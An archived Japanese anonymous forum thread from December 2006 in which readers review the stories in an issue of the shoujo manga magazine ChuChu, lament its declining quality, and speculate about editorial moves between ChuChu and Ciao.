259 :花と名無しさん:2006/12/22(金) 19:19:40 ID:???0
【表紙/ばやし】 表紙はどーでもいい
【さくら/ばやし】結城君のメイド姿カワユス
【クレゲー/七島】  どーでもいい
【くすり/高宮】 連載二回目を期待しておく
【イタコ/笹木】   続きは想像しろって言われても・・・w
【きみに/かわはら】ナンカツマンネ
【ひとひら/やぶ】 イイ。
【AL/水都】    これ読んでると腹が減る
【アイノコトバ/杉山】 性ゴミへどーぞ
【行った勝ち/陣名】担当さん・・・ww
【NG/宮脇】    イイ
【上手な/七瀬】  読んだけどどんなのだったっけ?
【おま俺/藤田】  フツー
【予告】     陣名さんの連載マダー?
【付録】     絵は陣名さんのと高宮さんのがイイ   
【総評】     毎月毎月つまらなくなってく気が・・・

260 :花と名無しさん:2006/12/22(金) 23:05:53 ID:???0
正直なところ
新人の読みきりは1本でいいと思った。
満足できる作品が少なくなってて読むのが疲れるし、
連載作品でも背景が白いのが多いときたもんだ。

読み応えも見応えも無く、スッカスカになってきたなぁ。
ばやしタソに頑張って欲しくて毎号買ってるが…
こんな惨状だと対象年齢の子は買わないよなぁ。と心配。

長文ですまんかった。

261 :花と名無しさん:2006/12/22(金) 23:54:19 ID:???0
その白さがいいんじゃないか。

262 :花と名無しさん:2006/12/23(土) 00:02:33 ID:???0
とりあえず、誰か編集部に種村の時代は終わったと告げてくれ
もう見てられない

263 :花と名無しさん:2006/12/23(土) 02:30:16 ID:???O
自分は新人よりも連載がいまいちな気がする。
読者層に受ける連載増やさないと
毎号楽しみに買ってくれないだろうし。

ばやしさんとか自分的にはおもしろいのだが
全体的にみるとなんかパワー不足な雑誌なんだよなぁ。

264 :花と名無しさん:2006/12/23(土) 02:33:23 ID:???0
ばやしさんは最近作画くずれ酷すぎないか…なんかなぁ・・・

265 :花と名無しさん:2006/12/23(土) 12:32:09 ID:???O
クリスマスカード懸賞、うさみん以外皆に応募したんだが
結局杉山さん1通しか届かなかった。無念。
年賀状は七島たんのが当たりますように。

266 :花と名無しさん:2006/12/23(土) 15:28:37 ID:???O
>>265
うさみん以外皆にワロスw


267 :花と名無しさん:2006/12/24(日) 08:30:49 ID:???0
やぶうちが一番競争率高そう。

268 :花と名無しさん:2006/12/24(日) 19:50:56 ID:???O
陣名先生のカード届きましたよー。
ありがとう〜!

269 :花と名無しさん:2006/12/24(日) 22:59:24 ID:???0
ゆきのんのキタ――(゚∀゚)――!!
ていうかゆきのんのしか出してないけど

年賀状は出そうと思って応募せずに期限来ちゃったorz
あーあ・・・

270 :花と名無しさん:2006/12/26(火) 16:58:19 ID:???0
来月号のちゃおにおおばやしがたんぽぽ前線書きます

271 :花と名無しさん:2006/12/27(水) 03:49:27 ID:???0
chuchuが廃刊してもおおばやしはちゃおに帰ってこれそうだね。

272 :花と名無しさん:2006/12/27(水) 07:47:56 ID:???O
すぐに廃刊はないだろうけど隔月にもどるのはありえるかもね。

けどその時はさすがに雑誌名かえるかな。

273 :花と名無しさん:2006/12/27(水) 14:16:27 ID:???0
ちゃおに新人が増えても読ませる新人も絵が魅力的な新人も
そんなにいなかったってことだね。
ちゃおで切磋琢磨させたほうが良かったのかもね。
chuchuは増刊扱いの頃の方が面白かった。

274 :花と名無しさん:2006/12/27(水) 18:05:29 ID:???P
そろそろ阿南をちゅちゅに回すとか。

275 :花と名無しさん:2006/12/27(水) 18:46:05 ID:???0
そんな無計画なw
だが、そんな案配だと、ホント作家余りすぎていると感じるよ。

276 :花と名無しさん:2006/12/27(水) 19:06:13 ID:???0
じゃあやがみんを。

277 :花と名無しさん:2006/12/27(水) 19:10:53 ID:???0
やがみんは多方面迅速機動型のマンガ家で、ちゃお編集部の最終兵器ですw

278 :花と名無しさん:2006/12/27(水) 19:34:43 ID:???0
ちゅちゅカレンダーにやがみんがいた不思議

279 :花と名無しさん:2006/12/27(水) 19:59:19 ID:???0
確かに、ちゅちゅマンガ家先生の第二席目に……


何を企んでいる、へんしゅーちょー

280 :花と名無しさん:2006/12/27(水) 21:13:02 ID:???0
どうやら八神で梃入れするようだな。

281 :花と名無しさん:2006/12/27(水) 21:19:43 ID:???0
では、ChuChuに投入されたやがみんがどういうマンガを書くかを、みんなで大胆に予想してみよう。


・・・・思い浮かばない、何でも描ける人だからな



282 :花と名無しさん:2006/12/27(水) 22:37:17 ID:???0
もう描いてるじゃん、既に何本か。

283 :花と名無しさん:2006/12/27(水) 22:55:54 ID:???0
八神をchuchuに分離するのは賛成だが、
ちゃお編集部的にはあれでいいのだろうか?

284 :花と名無しさん:2006/12/28(木) 08:29:09 ID:???O
ちゃおでヤガミンよりアンケ取り出した新人が出て来たか
その代わりになりそうな新人がでてきたか…
そうでもない限り売り上げ落ち続ける雑誌に
わざわざ引き渡す準備なんてしない
もともと雑誌内でのアンケ取りよりも
単行本売り上げ期待される作家だし
両人にとって得策かと

285 :花と名無しさん:2006/12/28(木) 10:31:24 ID:???0
テンプラゴチです。でも漫画だけ。
【さくら/ばやし】 結城君かわゆす!絵はそうでもないが話は好き
【クレゲー/七島】 顔長いの気になる。話は普通。
【くすり/高宮】 思ったより面白かった
【イタコ/笹木】 オチちょっと痛々しいな
【きみに/かわはら】 気持ちは分かるがちょっと地味
【ひとひら/やぶ】 やぶの普通の女学生はいい。普通のめがね男子もいい。
【AL/水都】 毎回顔がでかいのが気になるけど嫌いな絵柄ではないし面白い
【アイノコトバ/杉山】 決め台詞くどい。絵はいいのに何でこんなキモイの描かされてんだ
【行った勝ち/陣名】 担当さん味出し過ぎw
【NG/宮脇】 普通の少女マンガとして読める
【上手な/七瀬】 …なんか地味なんだな…雰囲気も悪く無いのに惜しい
【おま俺/藤田】 今回のはかなりツボだった。終わってちょっと残念

286 :花と名無しさん:2006/12/28(木) 15:14:30 ID:???0
りぼんからクッキーが出来てりぼんが衰退していったように
チュチュが伸びればちゃおが衰退していくのかもな。
先にチュチュが廃刊になるかもしれないが。
少女漫画を読む層は薄いのに雑誌だけ増える不思議。

287 :花と名無しさん:2006/12/28(木) 18:05:23 ID:???0
大学もそうだ。

288 :花と名無しさん:2006/12/29(金) 01:38:08 ID:???0
ばやしさんのちゃお読みきりはchuchuに読者を誘導するためのものらしい。
せっぱつまってきた感じだね。
やがみんをchuchuに載せるのも誘導?
でもちゃお買う子って付録目当てが多いと聞いたけどな。


289 :花と名無しさん:2006/12/29(金) 03:05:46 ID:???0
>読者を誘導するためのものらしい。
それは誰情報でしょうか?

290 :花と名無しさん:2006/12/29(金) 03:10:01 ID:???0
八神に人の心に食い入るような話は無理だろ

291 :花と名無しさん:2006/12/29(金) 12:23:02 ID:???O
友達の妹(リア消)はちゃおよりchuchuのが面白い言ってたな

68 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)